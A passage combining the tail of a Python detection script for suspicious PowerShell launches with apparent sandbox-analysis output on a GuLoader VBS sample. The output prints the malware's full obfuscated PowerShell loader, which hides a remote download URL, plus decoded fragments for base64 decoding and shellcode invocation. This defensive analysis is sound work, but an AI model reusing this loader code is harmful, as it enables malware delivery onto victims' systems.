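    "$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';"
    "$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value "
    "{ param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];"
    "$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});"
    "(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});"
    + "Get-History;" * 600
)

# Constructed process-creation records: the sample's chain, an admin's interactive
# PowerShell, and a logon script spawning cmd.exe (benign but parent/child-positive).
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": GULOADER_CMD},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": '"powershell.exe" -NoProfile Get-Process'},
    {"ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c net use H: \\fileserver\home"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event):
    """Return the list of indicators that fire for one process-creation event."""
    reasons = []
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    cmd = event["CommandLine"]
    if parent in SCRIPT_HOSTS and child in SHELLS:
        reasons.append(f"{parent} spawned {child}")
    if len(cmd) >= LONG_CMDLINE:
        reasons.append(f"command line is {len(cmd)} bytes")
    for label, pattern in OBFUSCATION_MARKERS.items():
        if pattern.search(cmd):
            reasons.append(label)
    return reasons


def triage(events, min_reasons=2):
    """Alert on events where at least `min_reasons` independent indicators agree."""
    alerts = []
    for event in events:
        reasons = assess(event)
        if len(reasons) >= min_reasons:
            alerts.append((event["Image"], reasons))
    return alerts


if __name__ == "__main__":
    for image, reasons in triage(EVENTS):
        print(image)
        for r in reasons:
            print("  -", r)
```

Two caveats from this very report. First, the second powershell.exe (the SysWOW64 copy, PID 1040) is listed with an unknown parent, so a parent/child rule on its own would not see the 32-bit stage that GuLoader needs for its shellcode; the command-line length and markers still fire on it because it receives the same script. Second, PowerShell script block logging (event 4104) records what Invoke-Expression actually runs, so the decoded `[Net.ServicePointManager]::SecurityProtocol` line and the download URL appear there in clear even though the process command line only shows the obfuscated form.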
          Source: amsi32_1040.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 8104, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 1040, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: classification engineClassification label: mal96.troj.expl.evad.winVBS@6/9@0/1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Discoach.Imm
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gx1ophtj.ezb.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8104
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1040
          Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Agterdelen.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. 
etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigt
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Thickskulled='func';Get-History;$Thickskulled+='t';Get-History;$Thickskulled+='i';$Hyldebusk=Get-History;$Thickskulled+='on:';(ni -p $Thickskulled -n Centralkomites -value { param($Toenderne);$Udlaansafdelingerne=5;do {$Hypersonically78+=$Toenderne[$Udlaansafdelingerne];$Udlaansafdelingerne+=6} until(!$Toenderne[$Udlaansafdelingerne])$Hypersonically78});ConvertTo-Html;(ni -p $Thickskulled -n Desiodothyroxine3 -value {param($Yodhs);.($Likrer) ($Yodhs)});ConvertTo-Html;$Protozoal=Centralkomites 'UdhunNAandseH lvfTKnowi.Sygehw';$Protozoal+=Centralkomites 'Tra.pe Ng eBGee.scStannl espIWeekeESkrumNOve,ft';$Affaldsbehandlingssystem=Centralkomites 'StensM SuitoTapwozPlatfividerlRooinl kogla Galm/';$Humps=Centralkomites 'Unt,rT b ralShowes ksko1I ter2';$Personnummers='Natur[ Mor.NPaa eEMondoTEll c.AudiosSuperEDirkeRTilkmvKorreiAl efcPyramEBrrespApproOAssorIu visNWhi ktIntegm per aGrievn ddanAfortrGFremhEFren rSoutf]Hellb: Hove: ensesEngulER.novcS wdeU PostrAcadeIElytrTAvedrySoejlpPardyRCodeboBassiTDeteko Fermc Utm.Ou derl Un,e=Gener$UnencHUdkraU ponsmAbeskpCheaps';$Affaldsbehandlingssystem+=Centralkomites 'Re.ym5 Me e. Re a0Civil Basha(,idsnWFjorti umlinA prodKilesoM.gilwIllegsGonad ParaNFaculTR sle B try1 Tita0 Neut.Restr0Umora;Disv Wan lWStimuiHjertnUnte 6Medbo4Mudst;Udsty Keciax bill6 ava4wicki;Lagri hawmrHunchvCbest:ifrer1ingse3Nasio4S,ema.udla 0Tabli)unalc RevolGFaaf eEquipcQuin,kSphaeo Gru / Cram2 Husa0 U.ya1 Week0T old0Herm.1Blast0Milli1Therm FortjFDuffaiLbeilrEberteHarmlf,sychoTrigoxchemo/Bihen1Ba.al3Fo pa4binar. 
etst0';$Transculturation=Centralkomites 'Skinnu SkilSUningeFo.terLavem-c eatATrochG nrulE EkstnUdartT';$Briggsk116=Centralkomites ' DischSaigat L.tttBundfpAnhe :Absfa/ Flaa/Dr ve6Sconc8 Eva..k bel1 arss6No pa8Marab.Raa e2P,ove2Musee3 Skam.Adiap1 Gyno0Dv gb8U rep/ ShelJUdlovDL the/CobalGJ ngaoDrewrsStealsVe.daiRibonpKorpseProgrrBobecsHansa.Reopetam ryoWeakmc';$Aftgtsydelser=Centralkomites ' pist>';$Likrer=Centralkomites 'RykkeiIsthmEPermix';$Hyposynergia='Sprngningsekspertens';$Konsigneres='\Discoach.Imm';Desiodothyroxine3 (Centralkomites '.loms$ UpsogHimmeL GushOVand,bLabioABriseLReinf: Ove A Buskf.orgeg SeldIS,rivVAcr tEDoodaLGyp ySRu,ddEEu,ognInsorS Penu=Endoc$Spen,EPol tN BlomVScumm: BordA .bysPQuinapAfskrdBlamia InfiTLitmua Brod+Donat$PrintKDu.niofr naNFishlsBegorIUm.rsgPicklnAsthoeTagdkrHjspneTube S');Desiodothyroxine3 (Centralkomites 'tho k$ AdstGSemiblB,folODactyBFassaAK risLudlgg:Unen pF gler ialti ttacsP nnikridicrExcitIJejunGFastlEbr gnNSymbre ars=Metap$ V lsbIllu,RAt mdIConfegBekengrepresLukrek Sd,k1Jydep1Balne6kryst. Fop SPigwaPWilcoL Ch liGtesktPriso(Ligh.$UknneAPolelfAfbetTMeropGMe.ogtConvesStamky cornDBrushe SerilPunktSDappeEAfgnarCockn)');Desiodothyroxine3 (Centralkomites $Personnummers);$Briggsk116=$Priskrigene[0];$Skaberkrfters=(Centralkomites 'Nimme$.tandGBou.hlErob,oTasseb ExcrAdigt
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exe    Section loaded: scrobj.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: gpapi.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: cryptnet.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: winnsi.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: winhttp.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: mswsock.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: webio.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: sspicli.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: dnsapi.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: cabinet.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: windows.storage.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: edputil.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: urlmon.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: iertutil.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: srvcli.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: netutils.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: wintypes.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: appresolver.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: slc.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: sppc.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: pcacli.dll
          Source: C:\Windows\System32\wscript.exe    Section loaded: sfc_os.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: napinsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshbth.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: winrnr.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sxs.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: napinsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: pnrpnsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshbth.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\wscript.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: Window Recorder    Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2565274087.0000000006DCE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdb5 source: powershell.exe, 00000008.00000002.2572137053.0000000007D28000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: .Core.pdb source: powershell.exe, 00000008.00000002.2572137053.0000000007D28000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe    Anti Malware Scan Interface: ShellExecute("POWERSHELL", ""Get-Service;$Thickskulled='func';Get-H", "", "", "0");
          Source: Yara match    File source: 00000008.00000002.2573407527.0000000009DB6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Anti Malware Scan Interface: FromBase64String($Poethood)$glObAl:OVeRNErvouSLY = [sYSTeM.TeXT.EnCodING]::ascII.GEtstRiNG($suMpEgN)$globaL:tJstaTivErnEs=$oVERNervOUslY.SubStrIng($PiTaRAH,$aKAdEmikERaRbeJdSLShEd)<#uptide Bogreols Vv
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Anti Malware Scan Interface: GetDelegateForFunctionPointer((Afvbning $Relieffets $Tracerteknikkens), (Semidestructive @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Dispensernes = [AppDomain]::CurrentDomain.GetAsse
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Uncherishing)), $Mondnitetens).DefineDynamicModule($Pathology, $false).DefineType($Mammilliform, $Opgavetyper, [System.MulticastDelega
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Anti Malware Scan Interface: FromBase64String($Poethood)$glObAl:OVeRNErvouSLY = [sYSTeM.TeXT.EnCodING]::ascII.GEtstRiNG($suMpEgN)$globaL:tJstaTivErnEs=$oVERNervOUslY.SubStrIng($PiTaRAH,$aKAdEmikERaRbeJdSLShEd)<#uptide Bogreols Vv
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
